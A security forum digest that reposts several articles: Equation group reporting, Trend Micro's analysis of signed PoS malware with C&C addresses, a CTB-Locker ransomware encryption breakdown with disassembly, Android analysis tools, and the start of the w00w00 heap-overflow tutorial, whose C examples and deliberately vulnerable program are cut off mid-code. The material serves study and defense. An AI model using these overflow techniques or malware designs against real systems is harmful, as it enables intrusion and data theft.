the NSA has multiple ways of obtaining source code from tech companies, including asking directly and posing as a software developer. If a company wants to sell products to the Pentagon or another sensitive U.S. agency, the government can request a security audit to make sure the source code is safe. "They don't admit it, but they do say, 'We're going to do an evaluation, we need the source code,'" said Vincent Liu, a partner at security consulting firm Bishop Fox and former NSA analyst. "It's usually the NSA doing the evaluation, and it's a pretty small leap to say they're going to keep that source code." Kaspersky called the authors of the spying program "the Equation group," named after their embrace of complex encryption formulas. The group used a variety of means to spread other spying programs, such as by compromising jihadist websites, infecting USB sticks and CDs, and developing a self-spreading computer worm called Fanny, Kasperky said. Fanny was like Stuxnet in that it exploited two of the same undisclosed software flaws, known as "zero days," which strongly suggested collaboration by the authors, Raiu said. He added that it was "quite possible" that the Equation group used Fanny to scout out targets for Stuxnet in Iran and spread the virus. (Reporting by Joseph Menn; Editing by Tiffany Wu) Sursa: Russian researchers expose breakthrough U.S. spying program | Reuters
  12. DbgKit February 15, 2015 | Permalink DbgKit is the first GUI extension for Debugging Tools for Windows. It will show you hierarchical view of processes and detailed information about each process including its full image path, command line, start time, memory statistics, vads, handles, threads, security attributes, modules, environment variables and more. WARNING: Using debugger extensions in a local kernel-mode debugging session or with tools like LiveKd that simulate local kernel debugging can cause the extensions to hang or to show not precise data. Download Sursa: Andrey Bazhan · DbgKit
  13. Signed PoS Malware Used In Pre-Holiday Attacks, Linked to Targeted Attacks 1:04 pm (UTC-7) | by Jay Yaneza (Threats Analyst) Last year, we detected some new PoS malware just before the holiday season. At that time, we omitted mentioning one fact – that the file was digitally signed with a valid certificate. Our research shows that these attacks targeting PoS malware are growing in sophistication, with code signing and improved encryption becoming more commonplace. We were also able to connect this PoS malware to the group involved with the Anunak malware—which is related to the Carbanak gang as posted by our colleagues over at Fox-IT. Figure 1. Sample with valid digital signature (taken on November 27, 2014) Malware code signing has increased in recent years and malware authors often seek keys that allow file signing to make malicious files appear as legitimate software. In this case, the attackers went through the whole process of requesting a digital certificate to sign the binary from a known certificate authority. COMODO, the issuer of this certificate, has since revoked the signing certificate. With this in mind, we began searching for additional components of this binary. This blog entry adds context to our our original blog post published last year. Carefully crafted binaries Based on other PoS malware that we have observed, we knew that this should be a multicomponent malware. As such, over the next couple of months after this incident, we have been monitoring this threat – one that caught our interest was a file with the SHA1 hash d8e79a7d21a138bc02ec99cfb9dc59e2e0cedf09. We noted some important things about this particular file: First, the file itself was signed similarly: used the same name, email and certificate authority. Secondly, the file construction was just too careful for standard malware that we see on a daily basis. Analysis of the file showed that it has its own encryption method that cannot be identified by common tools and it only decrypts the necessary code, which is destroyed after being used. Another interesting thing is that theGetProcAddress API was used (which is almost abandoned nowadays). It uses a brute force way to search the PE header table and calls NT* functions. During installation, the .text section is reused by the unpack code and installation, as seen below: Figure 2. Section reuse It then starts the host process svchost.exe with the parameters -k netsvc, with a suspended status. Once done, it proceeds to prepare a decrypted PE image file which can be written into memory. If everything is ready, it calls the NT* function to write the PE image into the host’s process memory, set the thread context and resume the thread. Finally, the PE image in memory is destroyed immediately. Figure 3. CreateProcess with suspended creation state Figure 4. Decrypted PE image file in memory While the PE image loaded in memory can be dumped to file, the string and API calls are still protected and it’s not straight forward to decipher. A decoder table was necessary to understand the inner working of the file, as shown below: Figure 5. Decoder table Using homemade decryption tools, the following functionality was discovered: Two fixed C&C Servers: 83.166.234.250 (ports 80 and 443), and 83.166.234.237 (port 443) Searching for the NSB Retail System Logs at C:\NSB\Coalition\Logs and nsb.pos.client.log Searching of files with the following extensions: bml cgi gif htm html jpg php png pst shtml txt [*]The use of VNC and Remote Desktop [*]Modifying the settings of the Windows firewall to give itself network access [*]Database connectivity [*]Reference to mimikatz – a tool to recover clear text passwords from LSASS [*]Encryption and decryption routines [*]Keylogging functionality Targeting the Top PoS Vendor: Epicor This was not your run-of-the-mill malware. It was a point-of-sale (PoS) malware that expliclty targeted theEpicor/NSB PoS system. Epicor was recently recognized as the top vendor of PoS software and leader in number of accounts and revenue over other top PoS vendors. A second look at the binary indicates that this particular file is related to the CARBERP banking family of Trojans, whose source code was leaked around 2013. In particular, this file had the following CARBERP plugins: plug and vnc.plug – VNC Plugin plug – iFOBS remote banking system plug – Ammy Remote Desktop Plugin We went back and cross-referenced other files to look for other complex malware samples that could be linked to this particular sample. We came across another one (SHA1 hash: a0527db046665ee43205f963dd40c455219beddd) which shared almost similar complexity. Some of the significant characteristics are listed below: Drops a file called ms*.exe and creates a startup item under the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run key. Figure 6. Created registry entry Aside from this, it changes the Zone.Identifier alternate data stream to avoid the pop-up warning: Figure 7. Alternate data stream It attempts to acquire elevated privileges via SeRestorePrivilege, SeBackUpPrivilege, and SeDebugPrivilege. Privileges like these allows the caller all access to the process, including the ability to call TerminateProcess(), CreateRemoteThread(), and other potentially dangerous API calls on the target process. It also has anti-debugging functions, and has its own dynamic unpacking code: Unpack code into .txt and jump back Allocate a block memory in 0x7FF90000 (almost reach user mode limitation) Unpack code into 0x7FF90000 and jump to here C&C server communication Using feedback provided by our Smart Protection Network, we looked for other threats that were similar to these two samples. A quick evolution We saw a file that was similar to the above files located in C:\Windows\SysWOW64 (for Windows 64-bit) andC:\Windows\System32 (for Windows 32-bit). The difference, however, was that it was for a DLL file (SHA1 hash: CCAD1C5037CE2A7A39F4B571FC10BE213249E611). Careful analysis revealed that, although compiled as a DLL file, it just uses the same cipher as the earlier samples. However, here a different C&C server was used (5.61.38.52:443). This change may have been an attempt to evade analysis, as some automated analysis tools do not process DLLs since they cannot be directly executed. Figure 8. Decoder table These indicators show that these file(s) were the work of a fairly sophisticated group of attackers. Who’s responsible for this? As it turns out, we can attribute this to the European APT group that uses Anunak malware, which was previously reported by Group-IB and Fox-IT. Our research leads us to believe that the files listed below could be used in similar campaigns within the United States and Canada: Table 1. List of hashes and detection names (click to enlarge) Table 2. List of hashes and C&C servers (click to enlarge) It should be noted that there are two files listed here (5fa2a0639897a42932272d0f0be2ab456d99a402 and CCAD1C5037CE2A7A39F4B571FC10BE213249E611) have fake compile time dates, which is a visible attempt to mask the file’s validity. According to the certificate revocation list, the certificates used to sign these malicious files were revoked on August 05, 2014. Figure 9. Certificate Revocation List However, the files were still signed with the certificates beyond that date. Here is the list of the files with digital certificates, and their signing time: Table 3. Time and date of malware signing Summary Trend Micro already detects all files listed above, where applicable. We would also like to recommend these steps in order to catch these kinds of attacks earlier: Audit accounts for failed/irregular logins. As seen by one of the tools used in this campaign, a password/credential dumper was used. If a user account was suddenly seen accessing a resource that looked unusual, then this may be a sign. Audit network log for abnormal connections. A network scanner was also used in this campaign, which can be used to enumerate a host’s resources. A passive network scanner, which observes anomalies in network traffic, can be used to flag these events and is often a built-in functionality of a breach detection system. Study warnings from security solutions. If you see a combination of hacking tools, backdoors and Trojans on a particular host, it may be efficient to acquaint oneself if these detections should be of an immediate concern – or not. In today’s world where there are just a lot of malware being seen in a daily basis, it is important to note which malware could severely affect your business. For a full list of things to check, you can refer to 7 Places to Check for Signs of a Targeted Attack in Your Network. To learn more about PoS RAM scraper malware, you can refer to our previous research paper titled PoS RAM Scraper Malware: Past, Present and Future. Additional information and analysis by Abraham Camba, Jane Hsieh, and Kenney Lu. Sursa: http://blog.trendmicro.com/trendlabs-security-intelligence/signed-pos-malware-used-in-pre-holiday-attacks-linked-to-targeted-attacks/
  14. CTB-Locker encryption/decryption scheme in details After my last post about CTB-Locker I received a lot of e-mails from people asking for a complete analysis of the malware. Most of them wanted to know if it’s possible to restore the compromised files without paying the ransom. The answer is simple: it’s impossible without knowing the Master key! That key resides on the malicious server and it’s the only way to restore every single compromised file. There are a some articles on the net about CTB-Locker’s modus-operandi. Everyone knows that ZLib is used, AES is used but only few of them mention the use of SHA256+Curve. To explain everything in details I’ll show you how encryption/decryption is done, step by step. Preamble: HIDDENINFO HiddenInfo file is the core of the malware, it’s full of precious data. There’s no need to explain every field of the file, a closer look at the first part of it would suffice because it has an important part in the encryption/decryption scheme. [TABLE=width: 838] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 [/TD] [TD=class: code]DCE1C1 call ds:CryptGenRandom DCE1C7 lea eax, [ebp+systemTimeAsFileTime] DCE1CA push eax DCE1CB call ds:GetSystemTimeAsFileTime DCE1D1 call ds:GetTickCount DCE1D7 mov [ebp+gettickcountVal], eax DCE1DA call ds:GetCurrentThreadId DCE1E0 mov esi, eax DCE1E2 rol esi, 10h ; Shift ThreadID DCE1E5 call ds:GetCurrentProcessId DCE1EB xor eax, esi ; ThreadID and ProcessID values inside the same dword DCE1ED mov [ebp+threadID_processID], eax DCE1F0 mov esi, 0EB7910h DCE1F5 lea edi, [ebp+machineGuid] DCE1F8 movsd ; Move MachineGUID DCE1F9 movsd DCE1FA movsd DCE1FB lea eax, [ebp+random] ; Random sequence of bytes DCE1FE push 34h ; Number of bytes to hash DCE200 push eax ; Sequence of bytes to hash DCE201 mov ecx, ebx ; Output buffer DCE203 movsd DCE204 call SHA256 ; SHA256(random) DCE209 mov al, [ebx+1Fh] DCE20C and byte ptr [ebx], 0F8h DCE20F push 0E98718h ; Basepoint DCE214 and al, 3Fh DCE216 push ebx ; SHA256(random) DCE217 push [ebp+outputBuffer] ; Public key DCE21A or al, 40h DCE21C mov [ebx+1Fh], al DCE21F call curve_25519 [/TD] [/TR] [/TABLE] The snippet is part of a procedure I called GenSecretAndPublicKeys. The secret key is obtained applying SHA256 to a random sequence of 0x34 bytes composed by: [TABLE=width: 628] [TR] [TD=class: gutter] 1 2 3 4 5 [/TD] [TD=class: code]0x14 bytes: from CryptGenRandom function 0x08 bytes: from GetSystemTimeAsFileTime 0x04 bytes: from GetTickCount 0x04 bytes: from (ThreadID ^ ProcessID) 0x10 bytes: MachineGuid [/TD] [/TR] [/TABLE] Curve25519 is used to generate the corresponding public key. You can recognize the algo from Basepoint vector because it’s a 0x09 byte followed by a series of 0x00 bytes (For a quick overview over the Elliptic curve algorithm used by the malware take a look here: Curve25519: high-speed elliptic-curve cryptography). GenSecretAndPublicKeys is called two times, so two private and two public keys are created. I name them as ASecret, APublic, BSecret and BPublic. [TABLE=width: 669] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 [/TD] [TD=class: code]DCF1E7 mov [esp+274h+public], offset MasterPublic ; MPublic key DCF1EE push eax ; BSecret DCF1EF lea eax, [ebp+Shared_1] ; Shared_1 DCF1F5 push eax DCF1F6 call curve_25519 DCF1FB add esp, 0Ch DCF1FE lea eax, [ebp+Shared_1] DCF204 push 20h DCF206 push eax DCF207 lea ecx, [ebp+aesKey] ; Hash is saved here DCF20A call SHA256 [/TD] [/TR] [/TABLE] SHA256(curve_25519(Shared_1, BSecret, MPublic)) Shared secret computation takes place. MPublic is the Master public key and it’s visible inside the memory address space of the malware. The Master secret key remains on the malicious server. To locate the Master public key is pretty easy because it’s between the information section (sequence of info in various languages) and the “.onion” address. Shared secret is then putted inside SHA256 hash algorithm, and the result is used as a key for AES encryption: [TABLE=width: 628] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 [/TD] [TD=class: code]DCF20F lea eax, [ebp+aesExpandedKey] DCF215 push eax DCF216 mov edx, 100h DCF21B lea ecx, [ebp+aesKey] DCF21E call AEXExpandKey DCF223 add esp, 0Ch DCF226 xor edi, edi DCF228 lea ecx, [ebp+aesExpandedKey] DCF22E lea eax, [edi+0EF71ACh] DCF234 push ecx DCF235 push eax DCF236 push eax DCF237 call AES_ENCRYPT ; AES encryption [/TD] [/TR] [/TABLE] The malware encrypts a block of bytes (named SecretInfo) composed by: [TABLE=width: 630] [TR] [TD=class: gutter] 1 2 3 4 [/TD] [TD=class: code]SecretInfo: ASecret ; a secret key generated by GenSecretAndPublicKeys MachineGuid ; Used to identify the infected machine Various information (fixed value, checksum val among others) [/TD] [/TR] [/TABLE] Not so hard but it’s better to outline everything: ASecret = SHA256(0x34_random_bytes) Curve_25519(APublic, ASecret, BasePoint) BSecret = SHA256(0x34_random_bytes) Curve_25519(BPublic, BSecret, BasePoint) Curve_25519(Shared_1, BSecret, MPublic) AES_KEY_1 = SHA256(Shared_1) Encrypted_SecretInfo = AES_ENCRYPT(SecretInfo, AES_KEY_1) Part of these informations are saved inside HiddenInfo file, more precisely at the beginning of it: [TABLE=width: 628] [TR] [TD=class: gutter] 1 2 3 4 [/TD] [TD=class: code]HiddenInfo: +0x00 offset: APublic +0x24 offset: BPublic +0x44 offset: Encrypted_SecretInfo [/TD] [/TR] [/TABLE] So, two public keys are visible, but private key ASecret is encrypted. It’s impossible to get the real ASecret value without the AES key… Ok, now that you know how HiddenInfo file is created I can start with the file encryption scheme. CTB-Locker file encryption [TABLE=width: 1138] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 [/TD] [TD=class: code]C74834 lea eax, [ebp+50h+var_124] ; Hash will be saved here C7483A push eax C7483B lea eax, [ebp+50h+var_E4] C74841 push 30h C74843 lea edi, [ebp+50h+var_D4] C74849 push eax ; 0x30 random bytes C7484A rep movsd C7484C call SHA256Hash ... C7486E push eax ; BasePoint C7486F lea eax, [ebp+50h+var_124] C74875 push eax ; CSecret: SHA256(0x30_random_bytes) C74876 lea eax, [ebp+50h+var_B4] C74879 push eax ; CPublic C7487A call curve25519 ; Generate a public key C7487F push offset dword_C943B8 ; DPublic: first 32 bytes of HiddenInfo C74884 lea eax, [ebp+50h+var_124] C7488A push eax ; CSecret C7488B lea eax, [ebp+50h+var_164] C74891 push eax ; Shared_2 C74892 call curve25519 ; Generate shared secret C74897 lea eax, [ebp+50h+var_144] C7489D push eax C7489E lea eax, [ebp+50h+var_164] C748A4 push 20h C748A6 push eax ; Shared_2 C748A7 call SHA256Hash ; SHA256(Shared_2) ... C74955 push 34h C74957 push [ebp+50h+var_18] ; Compression level: 3 C7495A lea eax, [ebp+50h+PointerToFileToEncrypt] C7495D push eax ; Original file bytes to compress C7495E call ZLibCompress ... C74B1F push [ebp+50h+var_4] C74B22 lea ecx, [ebp+50h+expandedKey] ; SHA256(Share_2) is used as key C74B28 push [ebp+50h+var_4] C74B2B call AES_Encrypt ; It encrypts 16 bytes per round starting from the first 16 bytes of the ZLib compressed file C74B30 add [ebp+50h+var_4], 10h C74B34 dec ebx ; Increase the pointer to the bytes to encrypt C74B35 jnz short loc_C74B1F ; Jump up and encrypt the next 16 bytes [/TD] [/TR] [/TABLE] It’s quite easy indeed, it uses the same functions (SHA256, Curve, AES). To understand what’s going on you only have to follow the code. The operations sequence is: CSecret = SHA256(0x30_random_bytes) Curve_25519(CPublic, CSecret, BasePoint) Curve_15519(Shared_2, CSecret, APublic) AES_KEY_2 = SHA256(Shared_2) ZLibFile = ZLibCompress(OriginalFile) Encrypted_File = AES_Encrypt(ZLibFile, AES_KEY2) DPublic inside the disassembled code is indeed APublic (first 32 bytes of HiddenInfo) That’s the way how CTB-Locker encrypts the bytes of the orginal file. These bytes are saved into the new compromised file with some more data. A typical compromised file has the next structure: [TABLE=width: 628] [TR] [TD=class: gutter] 1 2 3 [/TD] [TD=class: code]+0x00 offset: CPublic +0x20 offset: AES_Encrypt(InfoVector, AES_KEY_2) +0x30 offset: AES_Encrypt(ZLibFile, AES_KEY2) [/TD] [/TR] [/TABLE] InfoVector is a sequence of 16 bytes with the first four equals to “CTB1?, this tag word is used to check the correctness of the key provided by the server during the decryption routine. The decryption demonstration feature, implemented by the malware to prove that it can restore the file, uses AES_KEY_2 directly. If you remember the key was saved inside HiddenInfo, there are a total of five saved keys. In this case if you have CSecret you can easily follow the process described above (remember that APublic comes from the first 32 bytes of HiddenInfo), but without CSecret it’s impossible to restore the original files. It’s important to note that in the encryption process CTB-Locker doesn’t need an open internet connection. It doesn’t send keys/data to the server, it simply encrypts everything! Internet connection is needed in the decryption part only. CTB-Locker file decryption At some point, before the real decryption process, there’s a data exchange between the infected machine and the malicious server. The malware sends a block of bytes (taken from HiddenInfo) to the server and the server replies sending back the unique decryption key. The block is composed by the BPublic key, SecretInfo and some minor things: [TABLE=width: 628] [TR] [TD=class: gutter] 1 2 3 4 [/TD] [TD=class: code]DataToServer: 32 bytes: BPublic 90 bytes: SecretInfo 16 bytes: general info [/TD] [/TR] [/TABLE] The malware uses the key to restore the files. Do you remember the decryption part from my last post? Well, the real decryption scheme is not so different. There’s one more step, the calculation of the AES key. To do that the unique key sent by the server is used to decrypt every file: curve_25519(Shared, Unique_Key, first_0x20_byte_from_compromised_file) AES_DECRYPTION_KEY = SHA256(Shared) ZLibFile = AES_Decrypt(Encrypted_File, AES_DECRYPTION_KEY) OriginalFile = ZLibDecompress(ZLibFile) The unique key is sent just one time, so the decryption method needs only one key to decrypt all the compromised files. How is it possible? My explanation From HiddenInfo part I have: Curve_25519(APublic, Asecret, BasePoint) Curve_25519(BPublic, BSecret, BasePoint) Curve_25519(Shared_1, BSecret, MPublic) AES_KEY_1 = SHA256(Shared_1) Encrypted_SecretInfo = AES_ENCRYPT(SecretInfo, AES_KEY_1) The server receives DataToServer and it applies the principle of elliptic curve: Curve_25519(Shared_1, MSecret, BPublic) Shared_1 from the server is equal to Shared_1 calculated in the HiddenInfo creation part. Now, with Shared_1 it AES decrypts SecretInfo obtaining ASecret key. ASecret is the key used to decrypt all the compromised files. From Encryption part: Curve_25519(CPublic, CSecret, BasePoint) Curve_15519(Shared_2, CSecret, APublic) AES_KEY_2 = SHA256(Shared_2) ZLibFile = ZLibCompress(OriginalFile) Encrypted_File = AES_Encrypt(ZLibFile, AES_KEY_2) Saying that, here is how to use ASecret in the decryption process (applying the same EC principle): Curve_25519(Shared_2, ASecret, CPublic) AES_KEY_2 = SHA256(Shared_2) ZLibFile = AES_Decrypt(Encrypted_File, AES_KEY_2) OriginalFile =ZLibDecompress(ZLibFile) So, ASecret is the Unique_Key computed by the server and it’s used to decrypt every file. That means one thing only, without MSecret you can’t restore your original files… Final thoughts There’s nothing much to say really. CTB-Locker is dangerous and it will damage systems until people will do double-click over attachments.. sad but true. Feel free to contact me for comments, criticisms, suggestions, etcetc! Sursa: https://zairon.wordpress.com/2015/02/17/ctb-locker-encryptiondecryption-scheme-in-details/
  15. Android Malware Analysis Tools [TABLE=width: 900] [TR] [TD=class: news-txt, width: 900, align: left] TOOLS » AFLogical - Android forensics tool developed by viaForensics » AndroChef - Java Decompiler apk, dex, jar and java class-files » Androguard - Reverse engineering, Malware and goodware analysis of Android applications » Android Loadable Kernel Modules » Android SDK » Android4me - J2ME port of Google's Android » Android-apktool - A tool for reverse engineering Android apk files » Android-forensics - Open source Android Forensics app and framework » Android-random - Collection of extended examples for Android developers » APK Studio - Android Reverse Engineering Tool By Vaibhav Pandey a.k.a VPZ » ApkAnalyser - Static, virtual analysis tool » Apk-extractor - Android Application (.apk) file extractor and Parser for Android Binary XML » Apkinspector - Powerful GUI tool for analysts to analyze the Android applications » Apk-recovery - Recover main resources from your .apk file » ART - GUI for all your decompiling and recompiling needs » Audit tools » Canhazaxs - A tool for enumerating the access to entries in the file system of an Android device » Dava - Decompiler for arbitrary Java bytecode » DDMS - Dalvik Debug Monitor Server » Decaf-platform - DECAF Binary Analysis Platform » DecoJer - Java Decompiler » Dedexer - Disassembler tool for DEX files. » Device Monitor - Graphical user interface for several Android application debugging and analysis tools » Dex2jar - Tools to work with android .dex and java .class files » Dex-decomplier - Dex decompiler » Dexinfo - A very rudimentary Android DEX file parser » Dexter - Static android application analysis tool » Dexterity - Dex manipulation library » Dextools - Miscellaenous DEX (Dalvik Executable) tools » Drozer - Comprehensive security audit and attack framework for Android » Heimdall - Cross-platform open-source tool suite used to flash firmware (aka ROMs) onto Samsung mobile devices » Hidex - Demo application where a method named thisishidden() in class MrHyde is hidden from disassemblers but no called by the app » Hooker - Automated Dynamic Analysis of Android Applications » JAD - Java Decompiler » JADX - Dex to Java decompiler » JD-GUI - Standalone graphical utility that displays Java source codes of “.class” files » JEB Decompiler - The Interactive Android Decompiler » Luyten - Java Decompiler Gui for Procyon » Radare - The reverse engineering framework » Redexer - A Dalvik bytecode instrumentation framework » Reverse Android - Reverse-engineering tools for Android applications » Scalpel - A surgical debugging tool to uncover the layers under your app » Smali - An assembler/disassembler for Android's dex format » Soot - Java Optimization Framework » STAMP - STatic Analysis of Mobile Programs » Systrace - Analyze the performance capturing and displaying execution times of your applications and other Android system processes » TaintDroid - Tracking how apps use sensitive information required » Traceview - Graphical viewer for execution logs saved by your application » Undx - Bytecode translator » Xenotix-APK-Decompiler - APK decompiler powered by dex2jar and JAD » XML-apk-parser - Print AndroidManifest.xml directly from apk file » ZjDroid - Android app dynamic reverse tool based on Xposed framework UNPACKERS » Android Unpacker - Android Unpacker presented at Defcon 22 - Android Hacker Protection Level 0 » Dehoser - Unpacker for the HoseDex2Jar APK Protection which packs the original file inside the dex header » Kisskiss - Unpacker for various Android packers/protectors PACKERS / OBFUSCATORS » Allatori » APKfuscator - A generic DEX file obfuscator and munger » APKProtect » Bangcle » DexGuard - Optimizer and obfuscator for Android » HoseDex2Jar - Adds some instructions to the classes.dex file that Dex2Jar can not process » ProGuard - Shrinks, optimizes, and obfuscates the code by removing unused code and renaming classes, fields, and methods with semantically obscure names TOOLKITS » Android Malware Analysis Toolkit » APK Resource Toolkit » MobiSec » Open Source Android Forensics Toolkit » Santoku SANDBOXES » Android Sandbox » Anubis » APK Analyzer » AVCaesar » Droidbox » HackApp » Mobile Sandbox » SandDroid » VisualThreat [/TD] [/TR] [/TABLE] Sursa: http://www.nyxbone.com/malware/android_tools.html
  16. w00w00 on Heap Overflows Subject: w00w00 on Heap Overflows This is a PRELIMINARY BETA VERSION of our final article! We apologize for any mistakes. We still need to add a few more things. [ Note: You may also get this article off of ] [ http://www.w00w00.org/articles.html. ] w00w00 on Heap Overflows By: Matt Conover (a.k.a. Shok) & w00w00 Security Team ------------------------------------------------------------------------------ Copyright (C) January 1999, Matt Conover & w00w00 Security Development You may freely redistribute or republish this article, provided the following conditions are met: 1. This article is left intact (no changes made, the full article published, etc.) 2. Proper credit is given to its authors; Matt Conover (Shok) and the w00w00 Security Development (WSD). You are free to rewrite your own articles based on this material (assuming the above conditions are met). It'd also be appreciated if an e-mail is sent to either mattc@repsec.com or shok@dataforce.net to let us know you are going to be republishing this article or writing an article based upon one of our ideas. ------------------------------------------------------------------------------ Prelude: Heap/BSS-based overflows are fairly common in applications today; yet, they are rarely reported. Therefore, we felt it was appropriate to present a "heap overflow" tutorial. The biggest critics of this article will probably be those who argue heap overflows have been around for a while. Of course they have, but that doesn't negate the need for such material. In this article, we will refer to "overflows involving the stack" as "stack-based overflows" ("stack overflow" is misleading) and "overflows involving the heap" as "heap-based overflows". This article should provide the following: a better understanding of heap-based overflows along with several methods of exploitation, demonstrations, and some possible solutions/fixes. Prerequisites to this article: a general understanding of computer architecture, assembly, C, and stack overflows. This is a collection of the insights we have gained through our research with heap-based overflows and the like. We have written all the examples and exploits included in this article; therefore, the copyright applies to them as well. Why Heap/BSS Overflows are Significant ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ As more system vendors add non-executable stack patches, or individuals apply their own patches (e.g., Solar Designer's non-executable stack patch), a different method of penetration is needed by security consultants (or else, we won't have jobs!). Let me give you a few examples: 1. Searching for the word "heap" on BugTraq (for the archive, see www.geek-girl.com/bugtraq), yields only 40+ matches, whereas "stack" yields 2300+ matches (though several are irrelevant). Also, "stack overflow" gives twice as many matches as "heap" does. 2. Solaris (an OS developed by Sun Microsystems), as of Solaris 2.6, sparc Solaris includes a "protect_stack" option, but not an equivalent "protect_heap" option. Fortunately, the bss is not executable (and need not be). 3. There is a "StackGuard" (developed by Crispin Cowan et. al.), but no equivalent "HeapGuard". 4. Using a heap/bss-based overflow was one of the "potential" methods of getting around StackGuard. The following was posted to BugTraq by Tim Newsham several months ago: > Finally the precomputed canary values may be a target > themselves. If there is an overflow in the data or bss segments > preceding the precomputed canary vector, an attacker can simply > overwrite all the canary values with a single value of his > choosing, effectively turning off stack protection. 5. Some people have actually suggested making a "local" buffer a "static" buffer, as a fix! This not very wise; yet, it is a fairly common misconception of how the heap or bss work. Although heap-based overflows are not new, they don't seem to be well understood. Note: One argument is that the presentation of a "heap-based overflow" is equivalent to a "stack-based overflow" presentation. However, only a small proportion of this article has the same presentation (if you will) that is equivalent to that of a "stack-based overflow". People go out of their way to prevent stack-based overflows, but leave their heaps/bss' completely open! On most systems, both heap and bss are both executable and writeable (an excellent combination). This makes heap/bss overflows very possible. But, I don't see any reason for the bss to be executable! What is going to be executed in zero-filled memory?! For the security consultant (the ones doing the penetration assessment), most heap-based overflows are system and architecture independent, including those with non-executable heaps. This will all be demonstrated in the "Exploiting Heap/BSS Overflows" section. Terminology ~~~~~~~~~~~ An executable file, such as ELF (Executable and Linking Format) executable, has several "sections" in the executable file, such as: the PLT (Procedure Linking Table), GOT (Global Offset Table), init (instructions executed on initialization), fini (instructions to be executed upon termination), and ctors and dtors (contains global constructors/destructors). "Memory that is dynamically allocated by the application is known as the heap." The words "by the application" are important here, as on good systems most areas are in fact dynamically allocated at the kernel level, while for the heap, the allocation is requested by the application. Heap and Data/BSS Sections ~~~~~~~~~~~~~~~~~~~~~~~~~~ The heap is an area in memory that is dynamically allocated by the application. The data section initialized at compile-time. The bss section contains uninitialized data, and is allocated at run-time. Until it is written to, it remains zeroed (or at least from the application's point-of-view). Note: When we refer to a "heap-based overflow" in the sections below, we are most likely referring to buffer overflows of both the heap and data/bss sections. On most systems, the heap grows up (towards higher addresses). Hence, when we say "X is below Y," it means X is lower in memory than Y. Exploiting Heap/BSS Overflows ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ In this section, we'll cover several different methods to put heap/bss overflows to use. Most of examples for Unix-dervied x86 systems, will also work in DOS and Windows (with a few changes). We've also included a few DOS/Windows specific exploitation methods. An advanced warning: this will be the longest section, and should be studied the most. Note: In this article, I use the "exact offset" approach. The offset must be closely approximated to its actual value. The alternative is "stack-based overflow approach" (if you will), where one repeats the addresses to increase the likelihood of a successful exploit. While this example may seem unnecessary, we're including it for those who are unfamiliar with heap-based overflows. Therefore, we'll include this quick demonstration: ----------------------------------------------------------------------------- /* demonstrates dynamic overflow in heap (initialized data) */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define BUFSIZE 16 #define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */ int main() { u_long diff; char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE); diff = (u_long)buf2 - (u_long)buf1; printf("buf1 = %p, buf2 = %p, diff = 0x%x bytes\n", buf1, buf2, diff); memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '\0'; printf("before overflow: buf2 = %s\n", buf2); memset(buf1, 'B', (u_int)(diff + OVERSIZE)); printf("after overflow: buf2 = %s\n", buf2); return 0; } ----------------------------------------------------------------------------- If we run this, we'll get the following: [root /w00w00/heap/examples/basic]# ./heap1 8 buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes before overflow: buf2 = AAAAAAAAAAAAAAA after overflow: buf2 = BBBBBBBBAAAAAAA This works because buf1 overruns its boundaries into buf2's heap space. But, because buf2's heap space is still valid (heap) memory, the program doesn't crash. Note: A possible fix for a heap-based overflow, which will be mentioned later, is to put "canary" values between all variables on the heap space (like that of StackGuard mentioned later) that mustn't be changed throughout execution. You can get the complete source to all examples used in this article, from the file attachment, heaptut.tgz. You can also download this from our article archive at http://www.w00w00.org/articles.html. Note: To demonstrate a bss-based overflow, change line: from: 'char *buf = malloc(BUFSIZE)', to: 'static char buf[BUFSIZE]' Yes, that was a very basic example, but we wanted to demonstrate a heap overflow at its most primitive level. This is the basis of almost all heap-based overflows. We can use it to overwrite a filename, a password, a saved uid, etc. Here is a (still primitive) example of manipulating pointers: ----------------------------------------------------------------------------- /* demonstrates static pointer overflow in bss (uninitialized data) */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <errno.h> #define BUFSIZE 16 #define ADDRLEN 4 /* # of bytes in an address */ int main() { u_long diff; static char buf[BUFSIZE], *bufptr; bufptr = buf, diff = (u_long)&bufptr - (u_long)buf; printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n", &bufptr, bufptr, buf, diff, diff); memset(buf, 'A', (u_int)(diff + ADDRLEN)); printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n", &bufptr, bufptr, buf, diff, diff); return 0; } ----------------------------------------------------------------------------- The results: [root /w00w00/heap/examples/basic]# ./heap3 bufptr (0x804a860) = 0x804a850, buf = 0x804a850, diff = 0x10 (16) bytes bufptr (0x804a860) = 0x41414141, buf = 0x804a850, diff = 0x10 (16) bytes When run, one clearly sees that the pointer now points to a different address. Uses of this? One example is that we could overwrite a temporary filename pointer to point to a separate string (such as argv[1], which we could supply ourselves), which could contain "/root/.rhosts". Hopefully, you are starting to see some potential uses. To demonstrate this, we will use a temporary file to momentarily save some input from the user. This is our finished "vulnerable program": ----------------------------------------------------------------------------- /* * This is a typical vulnerable program. It will store user input in a * temporary file. * * Compile as: gcc -o vulprog1 vulprog1.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <errno.h> #define ERROR -1 #define BUFSIZE 16 /* * Run this vulprog as root or change the "vulfile" to something else. * Otherwise, even if the exploit works, it won't have permission to * overwrite /root/.rhosts (the default "example"). */ int main(int argc, char **argv) { FILE *tmpfd; static char buf[BUFSIZE], *tmpfile; if (argc <= 1) { fprintf(stderr, "Usage: %s 